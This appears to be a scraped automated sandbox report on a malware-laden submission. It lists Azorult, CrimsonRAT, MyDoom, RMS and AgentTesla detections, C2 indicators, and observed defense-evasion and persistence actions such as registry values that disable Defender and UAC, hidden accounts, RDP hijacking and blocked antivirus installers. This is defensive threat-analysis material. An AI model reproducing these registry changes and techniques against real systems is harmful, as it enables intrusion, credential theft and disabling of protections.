azorult | hxxp://roblox[.]com

Resubmissions

31-01-2025 14:27

250131-rsfnfsznhk 10

31-01-2025 14:21

31-01-2025 14:14

31-01-2025 14:10

31-01-2025 11:31

Analysis

max time kernel
719s
max time network
727s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
31-01-2025 11:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://roblox.com

Score

10^/10

azorult crimsonrat mydoom rms defense_evasion discovery execution infostealer lateral_movement persistence privilege_escalation rat trojan upx worm

Malware Config

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Family

azorult

http://boglogov.site/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0007000000023d53-1028.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat

Detects MyDoom family 1 IoCs

resource	yara_rule
behavioral1/memory/4576-171544-0x00000000004A0000-0x00000000004AD000-memory.dmp	family_mydoom

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

defense_evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	Azorult (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	Azorult (1).exe

Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	taskhostw.exe

MyDoom
MyDoom is a Worm that is written in C++.
worm mydoom
Mydoom family
mydoom
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms

UAC bypass 3 TTPs 5 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Windows security bypass 2 TTPs 1 IoCs

defense_evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	regedit.exe

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
2468	net.exe
1040	net1.exe

Blocks application from running via registry modification 13 IoCs

Adds application to list of disallowed applications.

defense_evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe"	Azorult (1).exe
Set value (int)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	Azorult (1).exe
Key created	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe"	Azorult (1).exe
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe"	Azorult (1).exe

Downloads MZ/PE file 15 IoCs

flow	pid	Process
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe
166	4744	chrome.exe

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Azorult (1).exe

Modifies Windows Firewall 2 TTPs 23 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
960	netsh.exe
1068	netsh.exe
3152	netsh.exe
4040	netsh.exe
1280	netsh.exe
4972	netsh.exe
3244	netsh.exe
3836	netsh.exe
1532	netsh.exe
5056	netsh.exe
1392	netsh.exe
2936	netsh.exe
4176	netsh.exe
3312	netsh.exe
2252	netsh.exe
3312	netsh.exe
1576	netsh.exe
2200	netsh.exe
620	netsh.exe
2052	netsh.exe
4420	netsh.exe
4820	netsh.exe
1604	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 3 IoCs

Modifies file attributes to stop it showing in Explorer etc.

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4820	attrib.exe
916	attrib.exe
5276	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/memory/4576-171545-0x000000007E1A0000-0x000000007E1A7000-memory.dmp	acprotect

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	taskhost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	Azorult (1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	CrimsonRAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	wini.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	R8.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	winlogon.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	cheat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	winlog.exe

Executes dropped EXE 33 IoCs

pid	Process
4832	website ip grabber.exe
1804	CrimsonRAT.exe
3232	dlrarhsiva.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
4060	Amus.exe
1952	Duksten.exe
5100	AgentTesla.exe
2452	Azorult (1).exe
1912	Azorult.exe
4972	wini.exe
3976	winit.exe
700	rutserv.exe
1788	Azorult.exe
2992	rutserv.exe
620	cheat.exe
4476	rutserv.exe
444	ink.exe
1468	rutserv.exe
2256	taskhost.exe
3600	rfusclient.exe
3820	rfusclient.exe
3556	P.exe
536	rfusclient.exe
3204	R8.exe
1680	winlog.exe
3972	winlogon.exe
2056	Rar.exe
2740	taskhostw.exe
732	RDPWInst.exe
4064	winlogon.exe
3244	Maldal.a.exe
2840	RDPWInst.exe
4732	Mari.exe

Loads dropped DLL 1 IoCs

pid	Process
4716	svchost.exe

Modifies file permissions 1 TTPs 62 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4980	icacls.exe
3680	icacls.exe
1620	icacls.exe
2800	icacls.exe
2416	icacls.exe
4840	icacls.exe
732	icacls.exe
4892	icacls.exe
2436	icacls.exe
2840	icacls.exe
3972	icacls.exe
2436	icacls.exe
4492	icacls.exe
4548	icacls.exe
1308	icacls.exe
384	icacls.exe
2408	icacls.exe
916	icacls.exe
3740	icacls.exe
4812	icacls.exe
2992	icacls.exe
700	icacls.exe
4540	icacls.exe
540	icacls.exe
4748	icacls.exe
184	icacls.exe
1632	icacls.exe
3292	icacls.exe
5000	icacls.exe
1108	icacls.exe
4960	icacls.exe
1308	icacls.exe
2092	icacls.exe
1464	icacls.exe
2408	icacls.exe
1680	icacls.exe
1612	icacls.exe
1968	icacls.exe
620	icacls.exe
540	icacls.exe
532	icacls.exe
3836	icacls.exe
3384	icacls.exe
4532	icacls.exe
4752	icacls.exe
4748	icacls.exe
4540	icacls.exe
4896	icacls.exe
4476	icacls.exe
3616	icacls.exe
448	icacls.exe
2796	icacls.exe
1928	icacls.exe
916	icacls.exe
1792	icacls.exe
4696	icacls.exe
3892	icacls.exe
2688	icacls.exe
3536	icacls.exe
2036	icacls.exe
536	icacls.exe
832	icacls.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microzoft_Ofiz = "C:\\Windows\\KdzEregli.exe"	Amus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\XRF = "C:\\Windows\\system32\\PrTecTor.exe"	Duksten.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult (1).exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1480	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
291	raw.githubusercontent.com
303	raw.githubusercontent.com
228	iplogger.org
227	iplogger.org
283	raw.githubusercontent.com
222	raw.githubusercontent.com
221	raw.githubusercontent.com
260	raw.githubusercontent.com
166	raw.githubusercontent.com
223	raw.githubusercontent.com
236	raw.githubusercontent.com
237	raw.githubusercontent.com
245	raw.githubusercontent.com
252	raw.githubusercontent.com
165	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
211	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult (1).exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	Azorult (1).exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Password Policy Discovery 1 TTPs
Attempt to access detailed information about the password policy used within an enterprise network.
discovery

Password Policy Discovery
T1201

AutoIT Executable 5 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0007000000023d83-1424.dat	autoit_exe
behavioral1/files/0x0007000000023d97-1535.dat	autoit_exe
behavioral1/files/0x0007000000023da1-1596.dat	autoit_exe
behavioral1/memory/4064-1768-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe
behavioral1/memory/4064-1771-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	autoit_exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\DALLAH.exe	Maldal.a.exe
File opened for modification	C:\Windows\SysWOW64\PrTecTor.exe	Duksten.exe
File created	C:\Windows\SysWOW64\regedit.exe	Duksten.exe
File opened for modification	C:\Windows\SysWOW64\regedit.exe	Duksten.exe
File created	C:\Windows\SysWOW64\DALLAH.exe	Maldal.a.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	powershell.exe
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe
File created	C:\Windows\SysWOW64\PrTecTor.exe	Duksten.exe
File opened for modification	C:\Windows\System32\GroupPolicy	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	powershell.exe

Hide Artifacts: Hidden Users 1 TTPs 4 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult (1).exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	Azorult (1).exe

Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs

pid	Process
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe
5052	Aurora Worm v1-Cracked by RoN1N.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023d1d-506.dat	upx
behavioral1/memory/4832-527-0x0000000000400000-0x0000000000476000-memory.dmp	upx
behavioral1/memory/4832-550-0x0000000000400000-0x0000000000476000-memory.dmp	upx
behavioral1/memory/4832-916-0x0000000000400000-0x0000000000476000-memory.dmp	upx
behavioral1/files/0x0008000000023dc2-1701.dat	upx
behavioral1/memory/3972-1705-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3972-1734-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x0007000000023de6-1763.dat	upx
behavioral1/memory/4064-1768-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/memory/4064-1771-0x0000000000CA0000-0x0000000000D8C000-memory.dmp	upx
behavioral1/files/0x0002000000041bee-165880.dat	upx
behavioral1/memory/4576-171545-0x000000007E1A0000-0x000000007E1A7000-memory.dmp	upx
behavioral1/memory/4576-171544-0x00000000004A0000-0x00000000004AD000-memory.dmp	upx

Drops file in Program Files directory 37 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	Azorult (1).exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	Azorult (1).exe
File opened for modification	C:\Program Files (x86)\AVG	Azorult (1).exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	Azorult (1).exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll	AgentTesla.exe
File opened for modification	C:\Program Files\ByteFence	Azorult (1).exe
File opened for modification	C:\Program Files\AVAST Software	Azorult (1).exe
File opened for modification	C:\Program Files\ESET	Azorult (1).exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config	AgentTesla.exe
File opened for modification	C:\Program Files\Common Files\McAfee	Azorult (1).exe
File opened for modification	C:\Program Files (x86)\Zaxar	Azorult (1).exe
File opened for modification	C:\Program Files\Malwarebytes	Azorult (1).exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	Azorult (1).exe
File created	C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll	AgentTesla.exe
File opened for modification	C:\Program Files (x86)\360	Azorult (1).exe
File opened for modification	C:\Program Files (x86)\SpyHunter	Azorult (1).exe
File opened for modification	C:\Program Files\COMODO	Azorult (1).exe
File opened for modification	C:\Program Files\AVG	Azorult (1).exe
File opened for modification	C:\Program Files\Kaspersky Lab	Azorult (1).exe
File opened for modification	C:\Program Files\Cezurity	Azorult (1).exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll	AgentTesla.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\SpyHunter	Azorult (1).exe
File opened for modification	C:\Program Files (x86)\AVAST Software	Azorult (1).exe
File opened for modification	C:\Program Files (x86)\Cezurity	Azorult (1).exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File created	C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll	AgentTesla.exe
File created	C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml	AgentTesla.exe
File opened for modification	C:\Program Files\Enigma Software Group	Azorult (1).exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files (x86)\Panda Security	Azorult (1).exe
File created	C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll	AgentTesla.exe

Drops file in Windows directory 23 IoCs

description	ioc	Process
File created	C:\Windows\Pire.exe	Amus.exe
File opened for modification	C:\Windows\Anti_Virus.exe	Amus.exe
File opened for modification	C:\Windows\LucKey.exe	Maldal.a.exe
File created	C:\Windows\Meydanbasi.exe	Amus.exe
File opened for modification	C:\Windows\Pide.exe	Amus.exe
File opened for modification	C:\Windows\Ankara.exe	Amus.exe
File created	C:\Windows\Adapazari.exe	Amus.exe
File opened for modification	C:\Windows\Adapazari.exe	Amus.exe
File created	C:\Windows\m_regedit.exe	Duksten.exe
File created	C:\Windows\LucKey.exe	Maldal.a.exe
File created	C:\Windows\Messenger.exe	Amus.exe
File created	C:\Windows\Ankara.exe	Amus.exe
File created	C:\Windows\My_Pictures.exe	Amus.exe
File opened for modification	C:\Windows\Meydanbasi.exe	Amus.exe
File opened for modification	C:\Windows\KdzEregli.exe	Amus.exe
File opened for modification	C:\Windows\Messenger.exe	Amus.exe
File created	C:\Windows\Pide.exe	Amus.exe
File opened for modification	C:\Windows\Pire.exe	Amus.exe
File created	C:\Windows\Cekirge.exe	Amus.exe
File opened for modification	C:\Windows\Cekirge.exe	Amus.exe
File created	C:\Windows\Anti_Virus.exe	Amus.exe
File created	C:\Windows\KdzEregli.exe	Amus.exe
File opened for modification	C:\Windows\My_Pictures.exe	Amus.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3292	sc.exe
452	sc.exe
544	sc.exe
3616	sc.exe
536	sc.exe
2200	sc.exe
4912	sc.exe
4960	sc.exe
3292	sc.exe
3684	sc.exe
560	sc.exe
1392	sc.exe
4000	sc.exe
560	sc.exe
1280	sc.exe
1696	sc.exe
4008	sc.exe
4960	sc.exe
4176	sc.exe
4732	sc.exe
2800	sc.exe
3204	sc.exe
3972	sc.exe
2104	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
